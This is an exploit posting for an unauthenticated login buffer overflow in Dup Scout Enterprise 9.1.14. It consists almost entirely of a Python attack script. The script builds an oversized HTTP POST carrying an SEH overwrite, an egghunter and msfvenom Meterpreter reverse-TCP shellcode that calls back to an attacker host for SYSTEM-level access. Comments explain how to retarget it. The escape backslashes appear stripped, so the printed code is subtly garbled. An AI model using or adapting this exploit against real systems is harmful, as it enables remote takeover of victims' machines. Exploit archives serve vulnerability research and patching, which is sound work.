Dup Scout Enterprise 9.1.14 Buffer Overflow
Posted on 29 November 2016
#!/usr/bin/python print "Dup Scout Enterprise 9.1.14 Login Buffer Overflow" print "Author: Tulpa / tulpa[at]tulpa-security[dot]com" #Author website: www.tulpa-security.com #Author twitter: @tulpa_security #Exploit will land you NT AUTHORITYSYSTEM #You do not need to be authenticated, password below is garbage #Swop out IP, shellcode and remember to adjust 'x41' for bytes #Tested on Windows 7 x86 Enterprise SP1 #Vendor has been notified on multiple occasions #Exploit for version 9.0.28: www.exploit-db.com/exploits/40457/ #Shout-out to carbonated and ozzie_offsec import socket import sys s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) connect=s.connect(('192.168.123.130',80)) #bad chars x00x0ax0dx26 #msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=192.168.123.134 LPORT=4444 -e x86/shikata_ga_nai -b 'x00x0ax0dx26' -f python --smallest #payload size 308 buf = "" buf += "xdbxdcxb8x95x49x89x1dxd9x74x24xf4x5fx33" buf += "xc9xb1x47x31x47x18x83xc7x04x03x47x81xab" buf += "x7cxe1x41xa9x7fx1ax91xcexf6xffxa0xcex6d" buf += "x8bx92xfexe6xd9x1ex74xaaxc9x95xf8x63xfd" buf += "x1exb6x55x30x9fxebxa6x53x23xf6xfaxb3x1a" buf += "x39x0fxb5x5bx24xe2xe7x34x22x51x18x31x7e" buf += "x6ax93x09x6exeax40xd9x91xdbxd6x52xc8xfb" buf += "xd9xb7x60xb2xc1xd4x4dx0cx79x2ex39x8fxab" buf += "x7fxc2x3cx92xb0x31x3cxd2x76xaax4bx2ax85" buf += "x57x4cxe9xf4x83xd9xeax5ex47x79xd7x5fx84" buf += "x1cx9cx53x61x6axfax77x74xbfx70x83xfdx3e" buf += "x57x02x45x65x73x4fx1dx04x22x35xf0x39x34" buf += "x96xadx9fx3ex3axb9xadx1cx52x0ex9cx9exa2" buf += "x18x97xedx90x87x03x7ax98x40x8ax7dxdfx7a" buf += "x6ax11x1ex85x8bx3bxe4xd1xdbx53xcdx59xb0" buf += "xa3xf2x8fx2dxa1x64xf0x1axd2xf2x98x58x25" buf += "xebx04xd4xc3x5bxe5xb6x5bx1bx55x77x0cxf3" buf += "xbfx78x73xe3xbfx52x1cx89x2fx0bx74x25xc9" buf += "x16x0exd4x16x8dx6axd6x9dx22x8ax98x55x4e" buf += "x98x4cx96x05xc2xdaxa9xb3x69xe2x3fx38x38" buf += "xb5xd7x42x1dxf1x77xbcx48x8axbex28x33xe4" buf += "xbexbcxb3xf4xe8xd6xb3x9cx4cx83xe7xb9x92" buf += "x1ex94x12x07xa1xcdxc7x80xc9xf3x3exe6x55" buf += "x0bx15xf6xaaxdax53x8cxc2xde" #pop pop ret 1004FAF3 nseh = "x90x90xEBx0B" seh = "xF3xFAx04x10" egghunter = "x66x81xcaxffx0fx42x52x6ax02x58xcdx2ex3cx05x5ax74" egghunter += "xefxb8x77x30x30x74x8bxfaxafx75xeaxafx75xe7xffxe7" evil = "POST /login HTTP/1.1 " evil += "Host: 192.168.123.132 " evil += "User-Agent: Mozilla/5.0 " evil += "Connection: close " evil += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 " evil += "Accept-Language: en-us,en;q=0.5 " evil += "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 " evil += "Keep-Alive: 300 " evil += "Proxy-Connection: keep-alive " evil += "Content-Type: application/x-www-form-urlencoded " evil += "Content-Length: 17000 " evil += "username=admin" evil += "&password=aaaaa " evil += "x41" * 13664 #subtract/add for payload evil += "B" * 100 evil += "w00tw00t" evil += buf evil += "x90" * 212 evil += nseh evil += seh evil += "x90" * 10 evil += egghunter evil += "x90" * 8672 print 'Sending evil buffer...' s.send(evil) print 'Payload Sent!' s.close()